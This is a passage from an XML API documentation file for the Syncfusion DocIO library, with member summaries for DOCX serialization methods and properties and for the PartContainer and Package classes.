        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.SerializeIndentation(Syncfusion.DocIO.DLS.WParagraphFormat)">
            <summary>
            Serializes the paragraph indentation
            </summary>
            <param name="paragraphFormat">The paragraph format</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.SerializeParagraphSpacing(Syncfusion.DocIO.DLS.WParagraphFormat)">
            <summary>
            Serializes the paragraph spacings
            </summary>
            <param name="paragraphFormat"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.SerializeTabs(Syncfusion.DocIO.DLS.WParagraphFormat)">
            <summary>
            Serializes the tabs
            </summary>
            <param name="paragraphFormat">The paragraph format</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.SerializeTab(Syncfusion.DocIO.DLS.Tab)">
            <summary>
            Serializes the tab
            </summary>
            <param name="tab">The tab</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.SerializeParagraphShading(Syncfusion.DocIO.DLS.WParagraphFormat)">
            <summary>
            Serializes the paragraph shadings
            </summary>
            <param name="paragraphFormat">The paragraph format</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.SerializeParagraphBorders(Syncfusion.DocIO.DLS.WParagraphFormat,System.Int32)">
            <summary>
            Serializes the paragraph borders
            </summary>
            <param name="paragraphFormat">The Paragraph format</param>
            <param name="multiplier"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.SerializeListParagraph(Syncfusion.DocIO.DLS.WParagraph)">
            <summary>
            Seraializes the pargraph list format
            </summary>
            <param name="paragraph">The paragraph</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.SerializeListStyle(Syncfusion.DocIO.DLS.WParagraphFormat)">
            <summary>
            Serializes the style list format
            </summary>
            <param name="paragraph">The paragraph</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.SerializeListFormat(Syncfusion.DocIO.DLS.WListFormat)">
            <summary>
            Serialize the list format
            </summary>
            <param name="lf">The list format</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.SerializeFrame(Syncfusion.DocIO.DLS.WParagraphFormat)">
            <summary>
            Serializes the paragraph frame.
            </summary>
            <param name="paragraphFormat"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.SerializeFrameWrapMode(Syncfusion.DocIO.FrameWrapMode)">
            <summary>
            Writes the frame's wrapping mode.
            </summary>
            <param name="relation">The relation.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.SerializeBorder(Syncfusion.DocIO.DLS.Border,System.String,System.Int32)">
            <summary>
            Serializes the Border
            </summary>
            <param name="border">The Border</param>
            <param name="tagName">The tag name</param>
            <param name="multiplier"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.SerializeLanguage(Syncfusion.DocIO.DLS.WCharacterFormat)">
            <summary>
            Serializes the language formats
            </summary>
            <param name="characterFormat"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.SerializeBoolProperty(System.String,System.Boolean)">
            <summary>
            Serializes the bool character format property
            </summary>
            <param name="tag">Tag name</param>
            <param name="value">if set to <c>true</c> [value].</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.SerializeContentTypes(System.String)">
            <summary>
            Serializes the content types [Content-Types].xml
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.AddAlternateChunkItem(System.Collections.Generic.Dictionary{System.String,System.String})">
            <summary>
            Add the Alternate chunks if it exists more than one items in same name 
            </summary>
            <param name="altchunkItems"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.SerializeDiagramType(Syncfusion.DocIO.DLS.Package,System.IO.MemoryStream)">
            <summary>
            Writes the type of the diagrams.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.GetContentType(System.String)">
            <summary>
            Gets the type of the content.
            </summary>
            <param name="partName">Name of the part.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.SerializeHFContentTypes(System.IO.MemoryStream)">
            <summary>
            Serializes the HeaderFooter content types
            </summary>
            <param name="stream"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.SerializeHeaderFootersContentType(Syncfusion.DocIO.DLS.HeaderFooterType,System.IO.MemoryStream)">
            <summary>
            Serializes the HeaderFooter content types.
            </summary>
            <param name="hfType">Type of the HeaderFooter.</param>
            <param name="stream">The stream.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.SerializeChartContentType(System.IO.MemoryStream)">
            <summary>
            Serialize chart content types
            </summary>
            <param name="memoryStream"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.WriteXmlItemsContentTypes(System.IO.MemoryStream)">
            <summary>
            Serialize the Xml type contents.
            </summary>
            <param name="stream"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.SerializeDefaultContentType(System.IO.MemoryStream,System.String,System.String)">
            <summary>
            Serializes the default content type
            </summary>
            <param name="stream">Content type stream</param>
            <param name="extension">The extenstion</param>
            <param name="contentType">The content type</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.SerializeOverrideContentType(System.IO.MemoryStream,System.String,System.String)">
            <summary>
            Serializes the Override content type.
            </summary>
            <param name="stream">The content type stream</param>
            <param name="partName">The name of the part</param>
            <param name="contentType">Content type</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.SerializeGeneralRelations">
            <summary>
            Serialize the general relations
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.SerializeRelationShip(System.IO.Stream,System.String,System.String,System.String)">
            <summary>
            Serializes the relationship
            </summary>
            <param name="stream">The memory stream</param>
            <param name="relationshipID">The relationship id</param>
            <param name="relationshipType">The relationship type</param>
            <param name="targetPath">The part of the target item</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.SerializeCoreProperties">
            <summary>
            Serializes the core properties
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.SerializeCustomProperties">
            <summary>
            Serializes the custom properties.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.isValidType(Syncfusion.CompoundFile.DocIO.PropertyType)">
            <summary>
            Determines whether [is valid type] [the specified type].
            </summary>
            <param name="type">The type.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.ConvertToValidXmlString(System.String)">
            <summary>
            Updates the text, that cannot be represented in Xml as defined by XML 1.0 specification.
            </summary>
            <param name="text"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.IsValidXmlChar(System.UInt16)">
            <summary>
            Checks for the valid xml character.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.SerializeAppProperties">
            <summary>
            Serializes the app properties (app.xml)
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.ReplaceInvalidSurrogateCharacters(System.String)">
            <summary>
            Checks if text have invalid surrogate charecters
            </summary>
            <param name="text">String</param>
            <returns>Return the text which doesn't have invalid surrogate charecter.</returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.IsDefaultStyle(Syncfusion.DocIO.DLS.Style)">
            <summary>
            Checks whether the style is 
            </summary>
            <param name="style"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.GetTabLeader(Syncfusion.DocIO.DLS.TabLeader)">
            <summary>
            Get the tab leader type as string
            </summary>
            <param name="tabLeader">The tab leader</param>
            <returns>returns the tab leader type as string</returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.GetTabJustification(Syncfusion.DocIO.DLS.TabJustification)">
            <summary>
            Gets the tab justication type as string
            </summary>
            <param name="tabJustification">The tab justification</param>
            <returns>returns the tab justication type as string</returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.GetListId(Syncfusion.DocIO.DLS.WListFormat)">
            <summary>
            Get the list ID
            </summary>
            <param name="lf">The list format</param>
            <returns>returns the list id</returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.AddListOverride(System.Int32,System.String)">
            <summary>
            Add the list override to ListStyleReferences collection
            </summary>
            <param name="listId">The list id</param>
            <param name="lfoStyleName">The LFO Style name</param>
            <returns>returns the list id from the list style reference collection</returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.SerializeNumPr(System.Int32,System.Int32)">
            <summary>
            Serializes the numbering properties to the paragraph
            </summary>
            <param name="listId"></param>
            <param name="listLevel"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.HasFont(Syncfusion.DocIO.DLS.WCharacterFormat)">
            <summary>
            Check whether the character format has font property
            </summary>
            <param name="characterFormat"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.CreateWriter(System.IO.Stream)">
            <summary>
            Create xml writer
            </summary>
            <param name="data">The stream</param>
            <returns>returns the xml writer</returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.CreateReader(System.IO.Stream)">
            <summary>
            Create xml reader
            </summary>
            <param name="stream">The stream</param>
            <returns>returns xml reader</returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.ResetRelationShipID">
            <summary>
            Reset the relationship id counter
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.GetNextRelationShipID">
            <summary>
            Get the next relationship ID
            </summary>
            <returns>returns the next relationship ID</returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.GetNextID">
            <summary>
            Get the next ID
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.GetTextureStyle(Syncfusion.DocIO.TextureStyle)">
            <summary>
            Get the TextureStyle as string
            </summary>
            <param name="texttureStyle"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.GetBorderStyle(Syncfusion.DocIO.DLS.BorderStyle)">
            <summary>
            Get the border style as string
            </summary>
            <param name="borderStyle"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.GetUnderlineStyle(Syncfusion.DocIO.DLS.UnderlineStyle)">
            <summary>
            Get the underline style as string
            </summary>
            <param name="underlineStyle"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.GetHighlightColor(System.Drawing.Color)">
            <summary>
            Get the highlight color as string
            </summary>
            <param name="color"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.ToString(System.Single)">
            <summary>
            Convert the float value to string.
            </summary>
            <param name="value">float value</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.GetRGBCode(System.Drawing.Color)">
            <summary>
            Get the RGB color code
            </summary>
            <param name="color">The color</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.GetDefFontSize(Syncfusion.DocIO.DLS.WordDocument,System.Int16)">
            <summary>
            Get the default font size
            </summary>
            <param name="doc"></param>
            <param name="key"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.GetPatternType(Syncfusion.DocIO.DLS.WListLevel)">
            <summary>
            Get the list pattern type as string.
            </summary>
            <param name="listLevel"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.GetListSymbol(System.Int32)">
            <summary>
            Get the list symbol
            </summary>
            <param name="level"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.UpdateNumberPrefix(System.String)">
            <summary>
            
            </summary>
            <param name="prefix"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.GetPageNumType(Syncfusion.DocIO.DLS.PageNumberStyle)">
            <summary>
            Get the page number type as string
            </summary>
            <param name="pageNumberStyle">The page number style</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.GetNextBookmarkID">
            <summary>
            Get the next bookmark ID
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.GetNextDocPrID">
            <summary>
            Get the docPr id (used for pictues)
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.GetNextShapeID">
            <summary>
            Get the next shape ID
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.ModifyText(System.String)">
            <summary>
            Update the text 
            </summary>
            <param name="text"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.GetBaseEntity(Syncfusion.DocIO.DLS.Entity)">
            <summary>
            Get the base entity
            </summary>
            <param name="entity"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.GetChartBaseEntity(Syncfusion.DocIO.DLS.Entity)">
            <summary>
            Gets chart base entity
            </summary>
            <param name="entity"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.IsPageBreakNeedToBeSkipped(Syncfusion.DocIO.DLS.Entity)">
            <summary>
            Determines whether the page break need to be skipped based on given entity owner.
            </summary>
            <param name="entity">Entity</param>
            <returns>true, if present inside TextBox/FootNote/EndNote/Header/Footer</returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.UpdateItemRelation(Syncfusion.DocIO.DLS.ParagraphItem,System.String,System.Collections.DictionaryEntry)">
            <summary>
            Update item relations
            </summary>
            <param name="item"></param>
            <param name="newID"></param>
            <param name="itemRel"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.FindRelationshipIds(System.IO.Stream)">
            <summary>
            
            </summary>
            <param name="XmlParaItemStream"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.IsDocumentContainsDefaultTableStyle">
            <summary>
            Determines whether document style collection has Default Table style
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.Close">
            <summary>
            Closes this instance.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.DocxSerializator.IsMacroEnabled">
            <summary>
            Gets a value indicating whether save as macro enabled format.
            </summary>
            <value>
            	<c>true</c> if save as macro enabled; otherwise, <c>false</c>.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.DocxSerializator.IsWord2003ML">
            <summary>
            Gets/Sets the value indicating whether the document is Word 2003 ML.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.DocxSerializator.IsWord2007">
            <summary>
            Gets a value indicating whether save as Word 2007 format.
            </summary>
            <value>
            	<c>true</c> if save as Word 2007 format; otherwise, <c>false</c>.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.DocxSerializator.IsWord2010">
            <summary>
            Gets a value indicating whether save as Word 2010 format.
            </summary>
            <value>
            	<c>true</c> if save as Word 2010 format; otherwise, <c>false</c>.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.DocxSerializator.IsWord2013">
            <summary>
            Gets a value indicating whether save as Word 2013 format.
            </summary>
            <value>
            	<c>true</c> if save as Word 2013 format; otherwise, <c>false</c>.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.DocxSerializator.SettingsRelations">
            <summary>
            Gets the settings relations.
            </summary>
            <value>The settings relations.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.DocxSerializator.BookMarkCollection">
            <summary>
             Gets the bookmark end if it preserve after the Paragraph/Table/Cell/Row end mark 
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.DocxSerializator.HeadersFooters">
            <summary>
            Gets the HeaderFooter Collection
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.DocxSerializator.ControlsPathNames">
            <summary>
            Gets the Control path names
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.DocxSerializator.ChartsPathNames">
            <summary>
            Gets the chart path names
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.DocxSerializator.HFRelations">
            <summary>
            Gets the HeaderFooter relations
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.DocxSerializator.HeaderFooterInclPicUrls">
            <summary>
            Collection of Include Picture targets with ids inside headers or footers.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.DocxSerializator.InclPicFieldUrl">
            <summary>
            Gets the Urls of the include picture fields
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.DocxSerializator.HeaderFooterInclPicFieldUrl">
            <summary>
            Contains key and include picture fields link present in HeaderFooters
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.DocxSerializator.ExternalLinkImages">
            <summary>
            Collection of relationship ids and its corresponding external link
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.DocxSerializator.ChartRelationId">
            <summary>
            Gets the chart relation Id's
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.DocxSerializator.HFChartCollection">
            <summary>
            Collection of Chart in Header Footers
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.DocxSerializator.FootnoteChartCollection">
            <summary>
            collection of chart in Footnote
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.DocxSerializator.EndnoteChartCollection">
            <summary>
            Collection of chart in Endnote
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.DocxSerializator.CommentsChartCollection">
            <summary>
            Collection of chart in Comments
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.DocxSerializator.DocumentChartCollection">
            <summary>
            Collection of chart in Document
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.DocxSerializator.ChartRelations">
            <summary>
            Collection for chart elements relations
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.DocxSerializator.ImagesPath">
            <summary>
            Collection of images path in Document
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.DocxSerializator.CommentHyperlinks">
            <summary>
            Gets the Hyperlink details present in the comments
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.DocxSerializator.CommentAlternateChunks">
            <summary>
            Gets the Alternate chunks details present in the comments
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.DocxSerializator.HyperlinkTargets">
            <summary>
            Collection of hyperlink targets with ids.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.DocxSerializator.AltChunkTargets">
            <summary>
            Collection of altChunk targets with ids.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.DocxSerializator.AltChunkContentTypes">
            <summary>
            Collection of altChunk targets with ids.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.DocxSerializator.FootnoteHyperlinks">
            <summary>
            Collection of hyperlink targets with ids inside footnotes.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.DocxSerializator.FootnoteAlternateChunks">
            <summary>
            Gets the collection of Alternate chunks with ids inside footnotes.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.DocxSerializator.EndnoteHyperlinks">
            <summary>
            Collection of hyperlink targets with ids inside endnotes.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.DocxSerializator.EndnoteAlternateChunks">
            <summary>
            Gets the collection of Alternate chunks with ids inside endnotes.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.DocxSerializator.HeaderFooterHyperlinks">
            <summary>
            Collection of hyperlink targets with ids inside headers or footers.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.DocxSerializator.HeaderFooterAlternateChunks">
            <summary>
            Gets the collection of alternateChunks with ids inside headers or footers.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.DocxSerializator.CommentCollection">
            <summary>
            Gets the comment collections
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.DocxSerializator.CommentsId">
            <summary>
            Gets the comment ids
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.DocxSerializator.OleContainers">
            <summary>
            Gets the ole containers
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.DocxSerializator.HFOleContainers">
            <summary>
            Gets the ole containers present in the HeaderFooters
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.DocxSerializator.OleIds">
            <summary>
            Gets the ole object ids
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.DocxSerializator.OleContentTypes">
            <summary>
            Gets the collection of OleObject content types
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.DocxSerializator.XmlItemsRelations">
            <summary>
            Gets the collection of Xml items relations
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.DocxSerializator.ListStyleReferences">
            <summary>
            Gets the list style references.
            </summary>
            <value>The list style references.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.DocxSerializator.PictureBullets">
            <summary>
            Gets the collection of picture bullets
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.DocxSerializator.HasFontTable">
            <summary>
            Represents the presence of font table
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.DocxSerializator.HasFootnote">
            <summary>
            Represents the presence of footnote
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.DocxSerializator.HasEndnote">
            <summary>
            Represents the presence of endnote
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.DocxSerializator.HasNumbering">
            <summary>
            Represents the presents the list styles
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.DocxSerializator.DocumentImages">
            <summary>
            Gets the collection of images present in the document body
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.DocxSerializator.FootnoteImages">
            <summary>
            Gets the collection of images present in the footnote images
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.DocxSerializator.EndnoteImages">
            <summary>
            Gets the colection of images in the endnote images
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.DocxSerializator.CommentImages">
            <summary>
            Gets the collection of images in the comments
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.DocxSerializator.FootnoteCollection">
            <summary>
            Gets the footnote collection
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.DocxSerializator.EndnoteCollection">
            <summary>
            Gets the endnote collection
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.DocxSerializator.HeaderFooterImages">
            <summary>
            Gets the collections of images present in the HeaderFooters
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.DocxSerializator.NonSupportedFields">
            <summary>
            Gets the collections of Non-supported fields
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.DocxSerializator.FieldStack">
            <summary>
            Gets the field stack.
            </summary>
            <value>The field stack.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.DocxSerializator.CurrentField">
            <summary>
            Gets the current field.
            </summary>
            <value>The current field.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.DocxSerializator.AutoShapeHelper">
            <summary>
            Gets the auto shape helper.
            </summary>
            <value>
            The auto shape helper.
            </value>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.Convertors.FieldGroupType">
            <summary>
            Specifies the field group type
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.Convertors.FieldGroupType.FieldInstruction">
            <summary>
            Specifies field instruction group
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.Convertors.FieldGroupType.FieldResult">
            <summary>
            Specifies field result group
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.Package">
            <summary>
            Summary description for Package.
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.PartContainer">
            <summary>
            Summary description for PartContainer.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.PartContainer.m_name">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.PartContainer.AddPart(Syncfusion.Compression.Zip.ZipArchiveItem)">
            <summary>
            Adds the part.
            </summary>
            <param name="item">The item.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.PartContainer.AddPart(Syncfusion.DocIO.DLS.Part)">
            <summary>
            Adds the part.
            </summary>
            <param name="xmlPart">The XML part.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.PartContainer.AddPartContainer(Syncfusion.DocIO.DLS.PartContainer)">
            <summary>
            Adds the part container.
            </summary>
            <param name="container">The container.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.PartContainer.EnsurePartContainer(System.String[],System.Int32)">
            <summary>
            Gets the container.
            </summary>
            <param name="nameParts">The name parts.</param>
            <param name="startNameIndex">Start index of the name.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.PartContainer.LoadRelations(Syncfusion.Compression.Zip.ZipArchiveItem)">
            <summary>
            Loads the relations.
            </summary>
            <param name="item">The item.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.PartContainer.GetPartName(System.String)">
            <summary>
            Get xml part name
            </summary>
            <param name="fullPath">The full path.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.PartContainer.Clone">
            <summary>
            Clones this instance.
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.PartContainer.CopyXmlPartContainer(Syncfusion.DocIO.DLS.PartContainer,Syncfusion.DocIO.DLS.Package,System.String[],System.Int32)">
            <summary>
            Copies the XML part container.
            </summary>
            <param name="newContainer">The new container.</param>
            <param name="srcPackage">The SRC package.</param>
            <param name="parts">The parts.</param>
            <param name="index">The index.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.PartContainer.CopyXmlPartItems(Syncfusion.DocIO.DLS.PartContainer,Syncfusion.DocIO.DLS.Package,System.String)">
            <summary>
            Copies the XML part items.
            </summary>
            <param name="newContainer">The new container.</param>
            <param name="srcPackage">The SRC package.</param>
            <param name="partName">Name of the part.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.PartContainer.GetXmlPartRelationKey(System.String)">
            <summary>
            Gets the XML part relation key.
            </summary>
            <param name="partName">Name of the part.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.PartContainer.UpdateInnerRelationTarget(Syncfusion.DocIO.DLS.Relations,System.Collections.Generic.Dictionary{System.String,System.String})">
            <summary>
            Updates the inner relation target.
            </summary>
            <param name="relation">The relation.</param>
            <param name="innerRelationTarget">The inner relation target.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.PartContainer.CopyInnerRelatedXmlParts(Syncfusion.DocIO.DLS.PartContainer,Syncfusion.DocIO.DLS.Package,Syncfusion.DocIO.DLS.Relations,System.String)">
            <summary>
            Copies the inner related XML parts.
            </summary>
            <param name="newContainer">The new container.</param>
            <param name="srcPackage">The SRC package.</param>
            <param name="relation">The relation.</param>
            <param name="curPartName">Name of the cur part.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.PartContainer.GetXmlPartContainer(Syncfusion.DocIO.DLS.PartContainer,System.String)">
            <summary>
            Gets the part container by name.
            </summary>
            <param name="containerName">Name of the container.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.PartContainer.GetXmlPartContainerPath(Syncfusion.DocIO.DLS.PartContainer,System.String)">
            <summary>
            Gets the XML part container path.
            </summary>
            <param name="container">The container.</param>
            <param name="target">The target.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.PartContainer.GetParentPartPath(Syncfusion.DocIO.DLS.PartContainer)">
            <summary>
            Gets the parent part path.
            </summary>
            <param name="srcContainer">The SRC container.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.PartContainer.Close">
            <summary>
            Closes this instance.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.PartContainer.XmlParts">
            <summary>
            Gets the XML parts.
            </summary>
            <value>The XML parts.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.PartContainer.XmlPartContainers">
            <summary>
            Gets the XML part containers.
            </summary>
            <value>The XML part containers.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.PartContainer.Relations">
            <summary>
            Gets the XML relations collection.
            </summary>
            <value>The XML relations.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.PartContainer.Name">
            <summary>
            Gets or sets the name.
            </summary>
            <value>The name.</value>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Package.FindPartContainer(System.String)">
            <summary>
            Gets the part container by name.
            </summary>
            <param name="containerName">Name of the container.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Package.FindPart(System.String)">
            <summary>
            
            </summary>
            <param name="fullPartName"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Package.Load(Syncfusion.Compression.Zip.ZipArchive)">
            <summary>
            Loads the specified zip archive.
            </summary>
            <param name="zipArc">The zip archive.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Package.LoadPart(Syncfusion.Compression.Zip.ZipArchiveItem)">
            <summary>
            Loads the part.
            </summary>
            <param name="item">The item.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Package.Clone">
